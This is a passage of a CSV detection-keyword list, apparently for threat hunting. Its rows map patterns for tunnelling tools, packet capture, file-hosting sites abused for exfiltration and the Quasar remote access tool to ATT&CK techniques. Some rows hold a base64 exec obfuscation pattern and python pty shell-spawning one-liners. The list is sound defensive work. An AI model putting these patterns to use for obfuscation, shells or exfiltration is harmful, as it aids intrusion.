servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#email","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*c4ec5f4d04c44b7a1c8cf813435dbc66a541b450bbaca4d70ded985d6518e76a*",".{0,1000}c4ec5f4d04c44b7a1c8cf813435dbc66a541b450bbaca4d70ded985d6518e76a.{0,1000}","greyware_tool_keyword","PyPagekite","This is 
pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#filehash","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*f16d1b7d69bf4c2a9a7e737809dd930012f419e7b7977887226f0f6859367cc4*",".{0,1000}f16d1b7d69bf4c2a9a7e737809dd930012f419e7b7977887226f0f6859367cc4.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#filehash","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*f2fd6676dba233df558278e6be42cd4c50a78a9c3f879db87acfc96607f41331*",".{0,1000}f2fd6676dba233df558278e6be42cd4c50a78a9c3f879db87acfc96607f41331.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","#filehash","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*http://*.pagekite.me*",".{0,1000}http\:\/\/.{0,1000}\.pagekite\.me.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*http://up.pagekite.net/*",".{0,1000}http\:\/\/up\.pagekite\.net\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*https://*.pagekite.me*",".{0,1000}https\:\/\/.{0,1000}\.pagekite\.me.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*https://pagekite.net/downloads/*",".{0,1000}https\:\/\/pagekite\.net\/downloads\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*https://pagekite.net/pk/src/*",".{0,1000}https\:\/\/pagekite\.net\/pk\/src\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*kitename.pagekite.me*",".{0,1000}kitename\.pagekite\.me.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*pagekite.httpd*",".{0,1000}pagekite\.httpd.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*pagekite.py /*",".{0,1000}pagekite\.py\s\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*pagekite.py 443 https://*",".{0,1000}pagekite\.py\s443\shttps\:\/\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*pagekite.py 80 http://*",".{0,1000}pagekite\.py\s80\shttp\:\/\/.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*pagekite.py --add *",".{0,1000}pagekite\.py\s\-\-add\s.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*pagekite.py localhost:*",".{0,1000}pagekite\.py\slocalhost\:.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","0","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*pagekite/PyPagekite*",".{0,1000}pagekite\/PyPagekite.{0,1000}","greyware_tool_keyword","PyPagekite","This is pagekite.py a fast and reliable tool to make localhost servers visible to the public Internet.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pagekite/PyPagekite","1","1","N/A","N/A","10","10","723","123","2024-08-13T23:59:19Z","2010-10-23T00:03:37Z" "*/pyshark.git*",".{0,1000}\/pyshark\.git.{0,1000}","greyware_tool_keyword","pyshark","Python wrapper for tshark allowing python packet parsing using wireshark dissectors","T1040 - T1213 - T1105 - T1572","TA0009 - TA0007","N/A","N/A","Discovery","https://github.com/KimiNewt/pyshark","1","1","N/A","N/A","6","10","2197","421","2024-08-10T06:39:53Z","2013-12-28T14:38:22Z" "*\pyshark\src\*",".{0,1000}\\pyshark\\src\\.{0,1000}","greyware_tool_keyword","pyshark","Python wrapper for tshark allowing python packet parsing using wireshark dissectors","T1040 - T1213 - T1105 - T1572","TA0009 - TA0007","N/A","N/A","Discovery","https://github.com/KimiNewt/pyshark","1","0","N/A","N/A","6","10","2197","421","2024-08-10T06:39:53Z","2013-12-28T14:38:22Z" "*import pyshark*",".{0,1000}import\spyshark.{0,1000}","greyware_tool_keyword","pyshark","Python wrapper for tshark allowing python packet parsing using wireshark dissectors","T1040 - T1213 - T1105 - T1572","TA0009 - TA0007","N/A","N/A","Discovery","https://github.com/KimiNewt/pyshark","1","0","N/A","N/A","6","10","2197","421","2024-08-10T06:39:53Z","2013-12-28T14:38:22Z" "*KimiNewt/pyshark*",".{0,1000}KimiNewt\/pyshark.{0,1000}","greyware_tool_keyword","pyshark","Python wrapper for tshark allowing python packet parsing using wireshark dissectors","T1040 - T1213 - T1105 - T1572","TA0009 - 
TA0007","N/A","N/A","Discovery","https://github.com/KimiNewt/pyshark","1","1","N/A","N/A","6","10","2197","421","2024-08-10T06:39:53Z","2013-12-28T14:38:22Z" "*pip install pyshark*",".{0,1000}pip\sinstall\spyshark.{0,1000}","greyware_tool_keyword","pyshark","Python wrapper for tshark allowing python packet parsing using wireshark dissectors","T1040 - T1213 - T1105 - T1572","TA0009 - TA0007","N/A","N/A","Discovery","https://github.com/KimiNewt/pyshark","1","0","N/A","N/A","6","10","2197","421","2024-08-10T06:39:53Z","2013-12-28T14:38:22Z" "*pyshark.FileCapture(*",".{0,1000}pyshark\.FileCapture\(.{0,1000}","greyware_tool_keyword","pyshark","Python wrapper for tshark allowing python packet parsing using wireshark dissectors","T1040 - T1213 - T1105 - T1572","TA0009 - TA0007","N/A","N/A","Discovery","https://github.com/KimiNewt/pyshark","1","0","N/A","N/A","6","10","2197","421","2024-08-10T06:39:53Z","2013-12-28T14:38:22Z" "*pyshark.LiveCapture(*",".{0,1000}pyshark\.LiveCapture\(.{0,1000}","greyware_tool_keyword","pyshark","Python wrapper for tshark allowing python packet parsing using wireshark dissectors","T1040 - T1213 - T1105 - T1572","TA0009 - TA0007","N/A","N/A","Discovery","https://github.com/KimiNewt/pyshark","1","0","N/A","N/A","6","10","2197","421","2024-08-10T06:39:53Z","2013-12-28T14:38:22Z" "*pyshark.RemoteCapture(*",".{0,1000}pyshark\.RemoteCapture\(.{0,1000}","greyware_tool_keyword","pyshark","Python wrapper for tshark allowing python packet parsing using wireshark dissectors","T1040 - T1213 - T1105 - T1572","TA0009 - TA0007","N/A","N/A","Discovery","https://github.com/KimiNewt/pyshark","1","0","N/A","N/A","6","10","2197","421","2024-08-10T06:39:53Z","2013-12-28T14:38:22Z" "* ,exec(__import__('base64').b64decode(""*",".{0,1000}\s,exec\(__import__\(\'base64\'\)\.b64decode\(\"".{0,1000}","greyware_tool_keyword","python","suspicious way of executing code","T1059","TA0005","pytoileur","N/A","Defense 
Evasion","https://x.com/Ax_Sharma/status/1795813203500322953/photo/4","1","0","N/A","Cool package campaign","8","10","N/A","N/A","N/A","N/A" "* -c 'import pty;pty.spawn(""/bin/bash*",".{0,1000}\s\-c\s\'import\spty\;pty\.spawn\(\""\/bin\/bash.{0,1000}","greyware_tool_keyword","python","interactive shell","T1059","TA0002 - TA0011","N/A","N/A","C2","N/A","1","0","N/A","greyware_tools high risks of false positives","6","10","N/A","N/A","N/A","N/A" "* -c 'import pty;pty.spawn(""/bin/sh*",".{0,1000}\s\-c\s\'import\spty\;pty\.spawn\(\""\/bin\/sh.{0,1000}","greyware_tool_keyword","python","interactive shell","T1059","TA0002 - TA0011","N/A","N/A","C2","N/A","1","0","N/A","greyware_tools high risks of false positives","6","10","N/A","N/A","N/A","N/A" "* -c 'import pty;pty.spawn(\""/bin/sh*",".{0,1000}\s\-c\s\'import\spty\;pty\.spawn\(\\\""\/bin\/sh.{0,1000}","greyware_tool_keyword","python","interactive shell","T1059","TA0002 - TA0011","N/A","N/A","C2","N/A","1","0","N/A","greyware_tools high risks of false positives","6","4","N/A","N/A","N/A","N/A" "*https://qaz.im/*",".{0,1000}https\:\/\/qaz\.im\/.{0,1000}","greyware_tool_keyword","qaz.im","temporary file hosting service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Data Exfiltration","https://qaz.im/","1","1","N/A","uploading files url","10","10","N/A","N/A","N/A","N/A" "*https://qaz.im/load/*",".{0,1000}https\:\/\/qaz\.im\/load\/.{0,1000}","greyware_tool_keyword","qaz.im","temporary file hosting service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Collection","https://qaz.im/","1","1","N/A","downloading files url","10","10","N/A","N/A","N/A","N/A" "*https://qaz.im/zaq/*",".{0,1000}https\:\/\/qaz\.im\/zaq\/.{0,1000}","greyware_tool_keyword","qaz.im","temporary file hosting service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - 
TA0009","N/A","Avos","Collection","https://qaz.im/","1","1","N/A","downloading notes url","10","10","N/A","N/A","N/A","N/A" "*https://qaz.is/*",".{0,1000}https\:\/\/qaz\.is\/.{0,1000}","greyware_tool_keyword","qaz.is","temporary file hosting service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Data Exfiltration","https://qaz.is/","1","1","N/A","uploading files url","10","10","N/A","N/A","N/A","N/A" "*https://qaz.is/load/*",".{0,1000}https\:\/\/qaz\.is\/load\/.{0,1000}","greyware_tool_keyword","qaz.is","temporary file hosting service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Collection","https://qaz.is/","1","1","N/A","downloading files url","10","10","N/A","N/A","N/A","N/A" "*https://qaz.is/zaq/*",".{0,1000}https\:\/\/qaz\.is\/zaq\/.{0,1000}","greyware_tool_keyword","qaz.is","temporary file hosting service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Collection","https://qaz.is/","1","1","N/A","downloading notes url","10","10","N/A","N/A","N/A","N/A" "*https://qaz.su*",".{0,1000}https\:\/\/qaz\.su.{0,1000}","greyware_tool_keyword","qaz.su","temporary file hosting service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Data Exfiltration","https://qaz.su/","1","1","N/A","uploading files url","10","10","N/A","N/A","N/A","N/A" "*https://qaz.su/load/*",".{0,1000}https\:\/\/qaz\.su\/load\/.{0,1000}","greyware_tool_keyword","qaz.su","temporary file hosting service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Collection","https://qaz.su/","1","1","N/A","downloading files url","10","10","N/A","N/A","N/A","N/A" "*https://qaz.su/zaq/*",".{0,1000}https\:\/\/qaz\.su\/zaq\/.{0,1000}","greyware_tool_keyword","qaz.su","temporary file hosting service - 
abused by attackers to share information with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Avos","Collection","https://qaz.su/","1","1","N/A","downloading notes url","10","10","N/A","N/A","N/A","N/A" "*https://qu.ax/*.*","https\:\/\/qu\.ax\/[^\s\n]+","greyware_tool_keyword","qu.ax","qu.ax is a quick and private file hosting service - abused by threat actors","T1560.001 - T1190 - T1102 - T1027.002","TA0001 - TA0005 - TA0042","N/A","N/A","Collection","https://qu[.]ax/","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "* CN=Quasar Server CA*",".{0,1000}\sCN\=Quasar\sServer\sCA.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*/Quasar.git*",".{0,1000}\/Quasar\.git.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*/Quasar.v*.zip*",".{0,1000}\/Quasar\.v.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*/Quasar/releases*",".{0,1000}\/Quasar\/releases.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","1","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*\appdata\roaming\*'DestPort'>4782*",".{0,1000}\\appdata\\roaming\\.{0,1000}\'DestPort\'\>4782\<\/Data\>.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*\CurrentVersion\Run\Quasar Client Startup*",".{0,1000}\\CurrentVersion\\Run\\Quasar\sClient\sStartup.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*\Prefetch\QUASAR.EXE*",".{0,1000}\\Prefetch\\QUASAR\.EXE.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*\Program Files\SubDir\Client.exe*",".{0,1000}\\Program\sFiles\\SubDir\\Client\.exe.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*\Quasar.Client\*",".{0,1000}\\Quasar\.Client\\.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*\Quasar.Common\*.cs*",".{0,1000}\\Quasar\.Common\\.{0,1000}\.cs.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*\quasar.p12*",".{0,1000}\\quasar\.p12.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*\Quasar.v*.zip*",".{0,1000}\\Quasar\.v.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*\Quasar-master*",".{0,1000}\\Quasar\-master.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*\Users\mthcht\AppData\Roaming\SubDir\Client.exe*",".{0,1000}\\Users\\mthcht\\AppData\\Roaming\\SubDir\\Client\.exe.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*\Windows\system32\SubDir\Client.exe*",".{0,1000}\\Windows\\system32\\SubDir\\Client\.exe.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","N/A","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*14CA405B-8BAC-48AB-9FBA-8FB5DF88FD0D*",".{0,1000}14CA405B\-8BAC\-48AB\-9FBA\-8FB5DF88FD0D.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","#GUIDproject","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*32A2A734-7429-47E6-A362-E344A19C0D85*",".{0,1000}32A2A734\-7429\-47E6\-A362\-E344A19C0D85.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","#GUIDproject","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*9F5CF56A-DDB2-4F40-AB99-2A1DC47588E1*",".{0,1000}9F5CF56A\-DDB2\-4F40\-AB99\-2A1DC47588E1.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. 
Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - T1082 - T1614 - T1016 - T1033 - T1552.001 - T1125","TA0002 - TA0003 - TA0005 - TA0006 - TA0008 - TA0009 - TA0011 - TA0040","N/A","Patchwork - LazyScripter - Gorgon Group - menuPass - BackdoorDiplomacy","RMM","https://github.com/quasar/Quasar","1","0","#GUIDproject","N/A","N/A","10","8498","2411","2024-02-29T06:37:37Z","2014-07-08T12:27:59Z" "*Backdoor.Quasar*",".{0,1000}Backdoor\.Quasar.{0,1000}","greyware_tool_keyword","Quasar","Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#.","T1548.002 - T1547.001 - T1059.003 - T1555 - T1005 - T1573.001 - T1564.001 - T1564.003 - T1105 - T1056.001 - T1112 - T1095 - T1571 - T1090 - T1021.001 - T1053.005 - T1553.002 - 